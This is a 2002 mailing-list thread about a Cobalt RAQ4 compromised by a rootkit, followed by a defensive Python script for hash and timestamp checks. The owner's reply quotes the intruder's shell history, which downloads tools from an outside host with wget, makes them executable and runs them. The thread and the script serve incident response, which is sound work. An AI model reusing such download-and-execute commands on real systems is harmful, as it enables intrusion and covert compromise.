
Re: [cobalt-users] RAQ4 Some system files change ex: ls, top, netstat, login What's wrong ?



Hello,

So sad. Someone hacked my box.
He switched off my SSH.
Then I had to telnet.
He changed the file "login" and I think it is keeping a log somewhere.
Then I su'd to root and saw .bash_history:

id
strings kernel.x
exit
cd /usr/include
mkdir ...
ps -aux | grep sk
wget rootshell.be/~borgon/sk
chmod +x sk
wget rootshell.be/~borgon/log
chmod +x log
./sk
./log -h 127.0.0.1
> also just noticed -
> 
> [root /bin]# ls -la | grep ls
> -rwxr-xr-x   1 root     root         5016 May 30  2000 false
> -rwxr-xr-x   1 root     root        50148 Sep  9  1999 ls
> 
> see ls is only 50 KB ish, yours is over 100 KB, definitely looks like a rooted
> box.
> 
> also you could also manually check the MD5 checksums with
> 
> [root bin]# md5sum /bin/ls /bin/netstat /bin/ps /bin/login /sbin/syslogd
> /usr/bin/du /usr/bin/killall /usr/bin/pstree /usr/bin/top
> f482ae701e46005a358a01c139f1ae74  /bin/ls
> eaa285a23a1715ce1c59998761538721  /bin/netstat
> 5e1725f2734365fef9e55398785f3033  /bin/ps
> a6b700aeabfb87115b3cc1a47a5a19e1  /bin/login
> 5b0e9951a07a0b232f083a78e7fcf668  /sbin/syslogd
> 5b1e21c2ec8de4676d296df4aee68dbb  /usr/bin/du
> 65853ea831ee24aa8ce6718e916a6e17  /usr/bin/killall
> db8be064ac078021b8dafba1510994ab  /usr/bin/pstree
> 48fbbb48204825866ab3089c2db96e87  /usr/bin/top
> 
> they should match these....  as long as I haven't been rooted ;)
> 
> fragga
> 
> ----- Original Message -----
> From: "Fragga" <fragga@xxxxxxxxxxxx>
> To: <cobalt-users@xxxxxxxxxxxxxxx>
> Sent: Monday, October 21, 2002 3:09 AM
> Subject: Re: [cobalt-users] RAQ4 Some system files change ex: ls, top,
> netstat, login What's wrong ?
> 
> 
> > Hi,
> >
> > if you haven't performed a restore I would say that looks like a possible
> > rootkit using modified binaries.
> > download and run ( as root ) a root kit checker from
> > http://www.chkrootkit.org/ to check for one.
> > looks grim though. was this box fully patched and do you allow any
> > users shell accounts ?
> >
> > fragga
> >
> > ----- Original Message -----
> > From: "Nucharin Jansen" <nucharin@xxxxxxxxxxx>
> > To: <cobalt-users@xxxxxxxxxxxxxxx>
> > Sent: Monday, October 21, 2002 12:56 AM
> > Subject: [cobalt-users] RAQ4 Some system files change ex: ls, top,
> > netstat, login What's wrong ?
> >
> >
> > >
> > > Hello,
> > >
> > > I couldn't access the website on the 18th - 20th.
> > > I requested a reboot of the RAQ4.
> > > When the NOC rebooted it on the 20th, I couldn't SSH.
> > > So, I enabled and used telnet to check.
> > > I found that many system files were replaced by new ones.
> > > ex:
> > >
> > >  /bin
> > > -rwxr-xr-x   1 root     root       184023 Oct 18 22:03 ls
> > > -rwxr-xr-x   1 root     root       258612 Oct 18 22:03 netstat
> > > -rwxr-xr-x   1 root     root        47388 Oct 18 22:03 ps
> > > -rwxr-xr-x   1 root     root        43336 Oct 18 22:03 login
> > >
> > > /sbin
> > > -rwxr-xr-x   1 root     root        28696 Oct 18 22:03 syslogd
> > >
> > > /usr/bin
> > > -rwxr-xr-x   1 root     root       117311 Oct 18 22:03 du
> > > -rwxr-xr-x   1 root     root        22459 Oct 18 22:03 killall
> > > -rwxr-xr-x   1 root     root        24147 Oct 18 22:03 pstree
> > > -rwxr-xr-x   1 root     root        68692 Oct 18 22:03 top
> > >
> > > I never ever installed anything before.
> > > I asked the NOC sys engineer there.  They never touched my bluebox.
> > > Do you have any suggestions ?
> > > Is it an automatic restore or hacking ?
> > > I can't use "ps -efw" to list all processes either.
> > >
> > > Thanks
> > > Nucharin J.
> > >
> > > _____________________________________
> > > cobalt-users mailing list
> > > cobalt-users@xxxxxxxxxxxxxxx
> > > To subscribe/unsubscribe, or to SEARCH THE ARCHIVES, go to:
> > > http://list.cobalt.com/mailman/listinfo/cobalt-users
> > >
> >
> 
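The two checks fragga describes above (compare each system binary's hash against a known-good value, and treat a set of unrelated binaries that all carry the same modification time as one suspicious event) can be scripted so the whole list is checked at once instead of eyeballing `ls -la`. The following is an added example written for this thread, not code from the list or from Cobalt; it works on a constructed temporary directory with stand-in file contents and a constructed timestamp, and the manifest format (`{relative path: digest}`) is an assumption of the example. It uses md5 only to match the `md5sum` output quoted in the thread; the same call with `algo="sha256"` builds a manifest with a current hash.

```python
import hashlib
import os
import tempfile
from collections import defaultdict
from pathlib import Path


def hash_file(path, algo="md5"):
    """Hash a file in chunks. md5 matches the thread's md5sum output; a
    manifest built today should use sha256 (same call, algo="sha256")."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, rel_paths, algo="md5"):
    """Snapshot a clean system as {relative path: digest}. Keep the result
    off-box or on read-only media, so it cannot be rewritten together with
    the binaries it describes."""
    root = Path(root)
    return {rel: hash_file(root / rel, algo) for rel in rel_paths}


def verify(root, manifest, algo="md5"):
    """Compare the live files against the manifest.
    Returns {relative path: 'ok' | 'modified' | 'missing'}."""
    root = Path(root)
    status = {}
    for rel, expected in manifest.items():
        p = root / rel
        if not p.is_file():
            status[rel] = "missing"
        elif hash_file(p, algo) != expected:
            status[rel] = "modified"
        else:
            status[rel] = "ok"
    return status


def mtime_clusters(root, rel_paths, min_cluster=3):
    """Heuristic from the thread: unrelated system binaries that all share
    one modification minute (the 'Oct 18 22:03' pattern) were written by a
    single event, not by routine upgrades. Returns [(minute_epoch, [paths])]
    for every group of at least min_cluster files."""
    root = Path(root)
    groups = defaultdict(list)
    for rel in rel_paths:
        p = root / rel
        if p.is_file():
            groups[int(p.stat().st_mtime) // 60].append(rel)
    return [(minute * 60, sorted(paths))
            for minute, paths in sorted(groups.items())
            if len(paths) >= min_cluster]


def demo():
    """Constructed scenario: snapshot a clean tree, then overwrite three
    binaries in the same minute and delete one tool. Returns the verify
    result and the mtime clusters found."""
    names = ["bin/ls", "bin/netstat", "bin/ps", "bin/login",
             "sbin/syslogd", "usr/bin/top"]
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel in names:
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            # constructed stand-in content, not a real binary
            p.write_bytes(b"clean stand-in for " + rel.encode() + b"\n")
        manifest = build_manifest(root, names)

        # Simulate the incident: three binaries replaced in one minute,
        # one tool removed entirely.
        tampered = ["bin/ls", "bin/netstat", "bin/ps"]
        same_minute = 1_034_971_380  # constructed epoch standing in for "Oct 18 22:03"
        for rel in tampered:
            (root / rel).write_bytes(b"replaced " + rel.encode())
            os.utime(root / rel, (same_minute, same_minute))
        (root / "usr/bin/top").unlink()

        return verify(root, manifest), mtime_clusters(root, names)


if __name__ == "__main__":
    status, clusters = demo()
    for rel, state in status.items():
        print(f"{state:9s} {rel}")
    for minute, paths in clusters:
        print(f"{len(paths)} files share mtime minute {minute}: {paths}")
```

Two caveats apply to running this on a box like the one in the thread. First, the comparison is only as good as the manifest: it has to come from a clean install (or a trusted copy of the same release) and be stored where the intruder cannot edit it, otherwise the "expected" values are whatever the rootkit left behind. Second, `md5sum` and `python` are themselves files on the compromised disk and can be replaced just like `ls` and `ps` were, so run the check from a rescue boot or from statically linked binaries on read-only media, not from the running system.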